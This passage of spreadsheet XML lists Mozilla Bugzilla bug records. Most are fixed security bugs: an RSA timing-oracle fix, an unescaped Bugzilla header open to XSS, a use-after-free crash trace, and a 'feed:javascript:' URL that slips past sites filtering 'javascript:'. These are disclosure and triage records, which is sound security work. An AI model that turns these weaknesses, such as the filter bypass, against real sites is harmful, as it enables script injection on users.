      </c>
      <c r="O2727" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2727" t="inlineStr">
        <is>
          <t>[graphserver][seamonkey]</t>
        </is>
      </c>
      <c r="Q2727" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2727" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2727" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2727" t="n">
        <v>1</v>
      </c>
      <c r="U2727" t="n">
        <v>0</v>
      </c>
      <c r="V2727" t="n">
        <v>19</v>
      </c>
      <c r="W2727" t="inlineStr">
        <is>
          <t>Before (some buildbot updates), these boxes didn't run this command.
Now they do, but fail.
http://tinderbox.mozilla.org/showlog.cgi?log=SeaMonkey/1292514884.1292517285.18390.gz&amp;fulltext=1
Linux x86-64 comm-central-trunk build on 2010/12/16 07:54:44
{
graph server post results complete failed
No machine_name called 'Linux_x86-64_comm-central-trunk' can be found
}
http://tinderbox.mozilla.org/showlog.cgi?log=SeaMonkey/1292514556.1292517834.20492.gz&amp;fulltext=1
OS X 10.6 comm-central-trunk build on 2010/12/16 07:49:16
{
graph server post results complete failed
No machine_name called 'OS_X_10.6_comm-central-trunk' can be found
}
NB: I think Firefox had an issue like this one, when they recently +/- shortened build names...</t>
        </is>
      </c>
      <c r="X2727" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2728">
      <c r="A2728" t="n">
        <v>1651411</v>
      </c>
      <c r="B2728" t="inlineStr">
        <is>
          <t>2020-07-08 09:24:59 -0700</t>
        </is>
      </c>
      <c r="C2728" t="inlineStr">
        <is>
          <t>New tlsfuzzer code can still detect timing issues in RSA operations.</t>
        </is>
      </c>
      <c r="D2728" t="inlineStr">
        <is>
          <t>2024-02-27 15:04:09 -0800</t>
        </is>
      </c>
      <c r="E2728" t="n">
        <v>1</v>
      </c>
      <c r="F2728" t="n">
        <v>1</v>
      </c>
      <c r="G2728" t="n">
        <v>3</v>
      </c>
      <c r="H2728" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2728" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2728" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2728" t="inlineStr">
        <is>
          <t>3.53</t>
        </is>
      </c>
      <c r="L2728" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2728" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2728" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2728" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2728" t="inlineStr">
        <is>
          <t>[embargo - coordinate with RedHat / rrelyea@redhat.com for disclosure] [nss-fx]</t>
        </is>
      </c>
      <c r="Q2728" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2728" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2728" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2728" t="n">
        <v>1</v>
      </c>
      <c r="U2728" t="n">
        <v>0</v>
      </c>
      <c r="V2728" t="n">
        <v>35</v>
      </c>
      <c r="W2728" t="inlineStr">
        <is>
          <t>Created attachment 9162206
nss-3.53.1-constant-time.patch
We have a new iteration of tlsfuzzer that does timing calculations against various malformed RSA operations which are used in Bleichenbacher style oracle attacks against RSA ssl cipher suites.
I have a patch that flattens this timing considerably. It hits almost all layers of the NSS stack: ssl, nss, softokn, and freebl.
The attack is only valid on the server side of an SSL RSA connection.
The new tlsfuzzer script has not been released yet.
Because of the extensiveness of the fix, redhat will not pick this up in it's latest RHEL release without some upstream testing, so we don't need this bug to be security sensitive, but I marked it as such in case mozilla wanted to handle the path as a embargoed fix ntil the new tlsfuzzer script is available.</t>
        </is>
      </c>
      <c r="X2728" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2729">
      <c r="A2729" t="n">
        <v>943803</v>
      </c>
      <c r="B2729" t="inlineStr">
        <is>
          <t>2013-11-27 01:43:49 -0800</t>
        </is>
      </c>
      <c r="C2729" t="inlineStr">
        <is>
          <t>Image decoding causing FireFox to crash with Goo Create</t>
        </is>
      </c>
      <c r="D2729" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:09 -0800</t>
        </is>
      </c>
      <c r="E2729" t="n">
        <v>1</v>
      </c>
      <c r="F2729" t="n">
        <v>1</v>
      </c>
      <c r="G2729" t="n">
        <v>3</v>
      </c>
      <c r="H2729" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2729" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2729" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2729" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2729" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2729" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2729" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2729" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2729" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q2729" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2729" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2729" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2729" t="n">
        <v>1</v>
      </c>
      <c r="U2729" t="n">
        <v>0</v>
      </c>
      <c r="V2729" t="n">
        <v>88</v>
      </c>
      <c r="W2729" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36
Steps to reproduce:
This is a bug discovered in Goo Create, the issue reported on our bugtracking system is located here : http://goo.myjetbrains.com/youtrack/issue/create-221
Crash reports reported related to this:
bp-dd9e5c6b-c6f7-46d8-afca-0847d2131121	2013-11-21	13:17
bp-b4364feb-e53b-4a1d-9444-cb0e22131121	2013-11-21	13:10
bp-3510a383-ad61-4290-821c-97ff32131121	2013-11-21	13:06
bp-98816ed0-8987-4915-92cf-257222131121	2013-11-21	13:01
bp-24d61e5d-e863-4fe4-b844-21f2d2131121	2013-11-21	13:00
bp-36f83bc5-a4ea-4e82-b392-00f5f2131121	2013-11-21	12:58
bp-2a8e1482-726a-458c-b538-6a5ed2131121	2013-11-21	12:56
bp-b1d3fe71-ef60-4942-898a-03ff02131121	2013-11-21	12:55
bp-fc8435e9-34f9-4ee2-b0ab-42f562131121	2013-11-21	12:47
bp-99e4ad95-8375-41c5-aca3-642d02131121	2013-11-21	11:20
bp-cb9351ba-c090-4d26-9e8b-55c0b2131121	2013-11-21	11:16
Computer specs :
Win 7 Home Premium 64bit , SP1
Intel i5-3450
8GB RAM
NVIDIA GeForce GTX 660
1. Go to Goo Create create.gootechnologies.com, login with an account you have been provided with. The accounts can be used simultaneously , but do create new projects to avoid possible conflicts.
2. Create a new project by clicking on the "create new project" button on the bottom right of the "manage projects" dialog which is popped up upon logging in. 
3. Click on the red asset library button in the bottom right, and click on the zombie or goon to add either of them to the scene. (A model with textures is needed)
4. Using the menu bar on the left side of the screen, find and click the material button to open up the material panel. (shiny sphere icon in the middle)
5. On the right top menu, under the project header, find and click the display textures button to be able to view the textures in the current project. (checkered square icon).
6. Click on the now visible textures , may have to click between them swiftly. In some cases it instantly craches, in some cases after a few clicks. 
Actual results:
FireFox crashes (shuts down instantly), followed by a dialog for submitting a crash report. 
Expected results:
I should still be in Goo Create, with the material panel showing settings and a preview image of the selected texture.</t>
        </is>
      </c>
      <c r="X2729" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2730">
      <c r="A2730" t="n">
        <v>1387784</v>
      </c>
      <c r="B2730" t="inlineStr">
        <is>
          <t>2017-08-05 17:33:19 -0700</t>
        </is>
      </c>
      <c r="C2730" t="inlineStr">
        <is>
          <t>Update more icons to the photon style</t>
        </is>
      </c>
      <c r="D2730" t="inlineStr">
        <is>
          <t>2017-10-09 08:25:12 -0700</t>
        </is>
      </c>
      <c r="E2730" t="n">
        <v>1</v>
      </c>
      <c r="F2730" t="n">
        <v>1</v>
      </c>
      <c r="G2730" t="n">
        <v>2</v>
      </c>
      <c r="H2730" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2730" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2730" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K2730" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2730" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2730" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2730" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2730" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2730" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p3]</t>
        </is>
      </c>
      <c r="Q2730" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2730" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2730" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T2730" t="n">
        <v>1</v>
      </c>
      <c r="U2730" t="n">
        <v>2</v>
      </c>
      <c r="V2730" t="n">
        <v>16</v>
      </c>
      <c r="W2730" t="inlineStr">
        <is>
          <t>Subscribe, fullscreen (the standalone button, not the one in the menu), preferences, share, find in page need to be updated.</t>
        </is>
      </c>
      <c r="X2730" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2731">
      <c r="A2731" t="n">
        <v>330555</v>
      </c>
      <c r="B2731" t="inlineStr">
        <is>
          <t>2006-03-15 03:45:57 -0800</t>
        </is>
      </c>
      <c r="C2731" t="inlineStr">
        <is>
          <t>[SECURITY] H1, H2 and H3 are not filtered in global/header.html.tmpl</t>
        </is>
      </c>
      <c r="D2731" t="inlineStr">
        <is>
          <t>2006-10-15 03:00:54 -0700</t>
        </is>
      </c>
      <c r="E2731" t="n">
        <v>1</v>
      </c>
      <c r="F2731" t="n">
        <v>1</v>
      </c>
      <c r="G2731" t="n">
        <v>4</v>
      </c>
      <c r="H2731" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2731" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2731" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2731" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L2731" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2731" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2731" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2731" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2731" t="inlineStr">
        <is>
          <t>[ready for 2.18.6][ready for 2.20.3][ready for 2.22.1][ready for 2.23.3]</t>
        </is>
      </c>
      <c r="Q2731" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2731" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2731" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2731" t="n">
        <v>1</v>
      </c>
      <c r="U2731" t="n">
        <v>0</v>
      </c>
      <c r="V2731" t="n">
        <v>19</v>
      </c>
      <c r="W2731" t="inlineStr">
        <is>
          <t>[% IF !h1.defined %][% h1 = title %][% END %]
    &lt;title&gt;[% title FILTER html %]&lt;/title&gt;
  [% IF h1 %]
    &lt;h1&gt;[% h1 %]&lt;/h1&gt;
  [% END %]
If h1 is not defined, which is the case on most pages, h1 has the same content as title, but only title is filtered, h1 is not (see above).
I was reviewing bug 330290 and I wondered why only part of the user identity was displayed in h1 while it was correctly displayed in the title. The reason was because we had:
&lt;title&gt;Edit user Guest 4 &amp;lt;guest4&amp;#64;bugzilla.org&amp;gt;&lt;/title&gt;
&lt;div id="header"&gt;
    &lt;h1&gt;Edit user Guest 4 &lt;guest4@bugzilla.org&gt;&lt;/h1&gt;
&lt;/div&gt;
"&lt;" and "&gt;" have not been filtered in h1 and Firefox ignored this "tag". If I wrote "script ..." instead of guest4, the JS code would have been executed.</t>
        </is>
      </c>
      <c r="X2731" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2732">
      <c r="A2732" t="n">
        <v>451037</v>
      </c>
      <c r="B2732" t="inlineStr">
        <is>
          <t>2008-08-18 05:34:30 -0700</t>
        </is>
      </c>
      <c r="C2732" t="inlineStr">
        <is>
          <t>document.loadBindingDocument() returns a document that does not have a script handling object</t>
        </is>
      </c>
      <c r="D2732" t="inlineStr">
        <is>
          <t>2008-10-29 10:09:22 -0700</t>
        </is>
      </c>
      <c r="E2732" t="n">
        <v>1</v>
      </c>
      <c r="F2732" t="n">
        <v>1</v>
      </c>
      <c r="G2732" t="n">
        <v>3</v>
      </c>
      <c r="H2732" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2732" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2732" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2732" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2732" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2732" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2732" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2732" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2732" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2732" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2732" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2732" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2732" t="n">
        <v>1</v>
      </c>
      <c r="U2732" t="n">
        <v>0</v>
      </c>
      <c r="V2732" t="n">
        <v>19</v>
      </c>
      <c r="W2732" t="inlineStr">
        <is>
          <t>This is similar to bug 448548.
This is fx2-only.  On fx2, document.loadBindingDocument() returns a document
that does not have a script handling object.  (On trunk and fx3.0.x, it does
not return anything.)</t>
        </is>
      </c>
      <c r="X2732" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2733">
      <c r="A2733" t="n">
        <v>862309</v>
      </c>
      <c r="B2733" t="inlineStr">
        <is>
          <t>2013-04-16 05:34:08 -0700</t>
        </is>
      </c>
      <c r="C2733" t="inlineStr">
        <is>
          <t>"ASSERTION: Trying to compute style without PresShell" with editor, cross-document selection</t>
        </is>
      </c>
      <c r="D2733" t="inlineStr">
        <is>
          <t>2015-06-08 16:09:44 -0700</t>
        </is>
      </c>
      <c r="E2733" t="n">
        <v>1</v>
      </c>
      <c r="F2733" t="n">
        <v>1</v>
      </c>
      <c r="G2733" t="n">
        <v>3</v>
      </c>
      <c r="H2733" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2733" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2733" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2733" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2733" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2733" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2733" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2733" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2733" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q2733" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2733" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2733" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2733" t="n">
        <v>1</v>
      </c>
      <c r="U2733" t="n">
        <v>0</v>
      </c>
      <c r="V2733" t="n">
        <v>25</v>
      </c>
      <c r="W2733" t="inlineStr">
        <is>
          <t>Created attachment 737937
testcase
###!!! ASSERTION: Trying to compute style without PresShell: 'presShell', file /Users/jruderman/trees/mozilla-central/editor/libeditor/html/nsHTMLCSSUtils.cpp, line 592
###!!! ASSERTION: wrong shell: '!doc || doc-&gt;GetShell() == this', file /Users/jruderman/trees/mozilla-central/layout/base/nsPresShell.cpp, line 6582
The "wrong shell" assertion was added in a security bug (bug 635852).
I'm guessing this will be fixed by not allowing selections to be in other documents.  That's part of the plan in bug 671152 and bug 768756, right?</t>
        </is>
      </c>
      <c r="X2733" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2734">
      <c r="A2734" t="n">
        <v>851781</v>
      </c>
      <c r="B2734" t="inlineStr">
        <is>
          <t>2013-03-16 00:10:57 -0700</t>
        </is>
      </c>
      <c r="C2734" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsContentUtils::RemoveScriptBlocker</t>
        </is>
      </c>
      <c r="D2734" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:23 -0700</t>
        </is>
      </c>
      <c r="E2734" t="n">
        <v>1</v>
      </c>
      <c r="F2734" t="n">
        <v>1</v>
      </c>
      <c r="G2734" t="n">
        <v>3</v>
      </c>
      <c r="H2734" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2734" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2734" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2734" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2734" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2734" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2734" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2734" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2734" t="inlineStr">
        <is>
          <t>[asan][adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q2734" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2734" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2734" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T2734" t="n">
        <v>1</v>
      </c>
      <c r="U2734" t="n">
        <v>0</v>
      </c>
      <c r="V2734" t="n">
        <v>24</v>
      </c>
      <c r="W2734" t="inlineStr">
        <is>
          <t>Created attachment 725727
Testcase
==18530== ERROR: AddressSanitizer: heap-use-after-free on address 0x601401063130 at pc 0x7fbd90d3aeb9 bp 0x7fffb2289fd0 sp 0x7fffb2289fc8
READ of size 8 at 0x601401063130 thread T0
    #0 0x7fbd90d3aeb8 in nsTArray_Impl&lt;nsCOMPtr&lt;nsIRunnable&gt;, nsTArrayInfallibleAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) ../../../dist/include/nsCOMPtr.h:409
    #1 0x7fbd90db4b42 in nsDocument::EndUpdate(unsigned int) content/base/src/nsDocument.cpp:4211
    #2 0x7fbd914a8ce8 in nsHTMLDocument::EndUpdate(unsigned int) content/html/document/src/nsHTMLDocument.cpp:2535
    #3 0x7fbd90d37177 in nsContentUtils::SetNodeTextContent(nsIContent*, nsAString_internal const&amp;, bool) content/base/src/mozAutoDocUpdate.h:38
    #4 0x7fbd90f5ae6a in mozilla::dom::FragmentOrElement::SetTextContentInternal(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) content/base/src/FragmentOrElement.cpp:938
    #5 0x7fbd933e1f91 in mozilla::dom::NodeBinding::set_textContent(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JS::Value*) ../../dist/include/nsINode.h:1088
    #6 0x7fbd933e08e8 in mozilla::dom::NodeBinding::genericSetter(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/NodeBinding.cpp:1501
    #7 0x7fbd94b50e33 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:327
    #8 0x7fbd94b51db0 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.h:135
    #9 0x7fbd94b528e1 in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:503
    #10 0x7fbd94baac61 in js::Shape::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Shape-inl.h:309
    #11 0x7fbd94bb2ad1 in js::baseops::SetPropertyHelper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, unsigned int, JS::MutableHandle&lt;JS::Value&gt;, int) js/src/jsobj.cpp:4114
    #12 0x7fbd94b58923 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) js/src/jsobjinlines.h:89
    #13 0x7fbd94b3b04b in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2252
    #14 0x7fbd94b320d2 in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:340
    #15 0x7fbd94b52f3d in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/jsinterp.cpp:530
    #16 0x7fbd94b533a8 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/jsinterp.cpp:569
    #17 0x7fbd94a0b5b3 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:5528
    #18 0x7fbd91692e68 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject&amp;, JS::CompileOptions&amp;, bool, JS::Value*) dom/base/nsJSEnvironment.cpp:1290
    #19 0x7fbd9171b8cb in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) dom/base/nsGlobalWindow.cpp:9957
    #20 0x7fbd91704024 in nsGlobalWindow::RunTimeout(nsTimeout*) dom/base/nsGlobalWindow.cpp:10209
    #21 0x7fbd9171ab78 in nsGlobalWindow::TimerCallback(nsITimer*, void*) dom/base/nsGlobalWindow.cpp:10478
    #22 0x7fbd937df6ac in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:496
    #23 0x7fbd937dfd20 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:587
    #24 0x7fbd937d56d3 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:627
    #25 0x7fbd9371c610 in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:238
    #26 0x7fbd92e6bc3c in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #27 0x7fbd9385ab49 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:216
    #28 0x7fbd92b8b1cc in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #29 0x7fbd9266dd1a in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:288
    #30 0x7fbd8fdfb405 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3880
    #31 0x7fbd8fdfc236 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3947
    #32 0x7fbd8fdfd0d9 in XRE_main toolkit/xre/nsAppRunner.cpp:4150
    #33 0x425556 in main browser/app/nsBrowserApp.cpp:228
    #34 0x7fbd985fe76c in
    #35 0x424864 in
0x601401063130 is located 16 bytes inside of 32-byte region [0x601401063120,0x601401063140)
freed by thread T0 here:
    #0 0x4188f7 in __interceptor_realloc
    #1 0x7fbd9963e4ae in moz_xrealloc memory/mozalloc/mozalloc.cpp:86
previously allocated by thread T0 here:
    #0 0x4188f7 in __interceptor_realloc
    #1 0x7fbd9963e4ae in moz_xrealloc memory/mozalloc/mozalloc.cpp:86
Shadow bytes around the buggy address:
  0x0c03002045d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c03002045e0: fa fa fa fa fa fa fa fa 00 00 00 fa fa fa fa fa
  0x0c03002045f0: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fa
  0x0c0300204600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0300204610: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c0300204620: fa fa fa fa fd fd[fd]fd fa fa fa fa fa fa fa fa
  0x0c0300204630: fa fa fa fa fa fa fa fa 00 00 04 fa fa fa fa fa
  0x0c0300204640: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c0300204650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0300204660: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0300204670: fa fa fa fa fd fd fd fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==18530== ABORTING</t>
        </is>
      </c>
      <c r="X2734" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2735">
      <c r="A2735" t="n">
        <v>758990</v>
      </c>
      <c r="B2735" t="inlineStr">
        <is>
          <t>2012-05-27 14:18:00 -0700</t>
        </is>
      </c>
      <c r="C2735" t="inlineStr">
        <is>
          <t>Don't allow feed: URLs with an innerURI that inherits the page's security context</t>
        </is>
      </c>
      <c r="D2735" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E2735" t="n">
        <v>1</v>
      </c>
      <c r="F2735" t="n">
        <v>1</v>
      </c>
      <c r="G2735" t="n">
        <v>6</v>
      </c>
      <c r="H2735" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2735" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J2735" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K2735" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2735" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2735" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2735" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2735" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2735" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q2735" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2735" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2735" t="inlineStr">
        <is>
          <t>Firefox 15</t>
        </is>
      </c>
      <c r="T2735" t="n">
        <v>1</v>
      </c>
      <c r="U2735" t="n">
        <v>0</v>
      </c>
      <c r="V2735" t="n">
        <v>29</v>
      </c>
      <c r="W2735" t="inlineStr">
        <is>
          <t>Created attachment 627593
testcase
"feed:javascript:" URLs can be used to XSS sites that just blacklist "javascript:" and "data:".
(Issue raised by Mario Gomes in bug 758907 comment 5, and brought to my attention by Reed Loden.)</t>
        </is>
      </c>
      <c r="X2735" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2736">
      <c r="A2736" t="n">
        <v>1657026</v>
      </c>
      <c r="B2736" t="inlineStr">
        <is>
          <t>2020-08-03 18:07:41 -0700</t>
        </is>
      </c>
      <c r="C2736" t="inlineStr">
        <is>
          <t>Any websites can run with PWA privileges on Fenix</t>
        </is>
      </c>
      <c r="D2736" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:28 -0700</t>
        </is>
      </c>
      <c r="E2736" t="n">
        <v>1</v>
      </c>
      <c r="F2736" t="n">
        <v>1</v>
      </c>
      <c r="G2736" t="n">
        <v>2</v>
      </c>
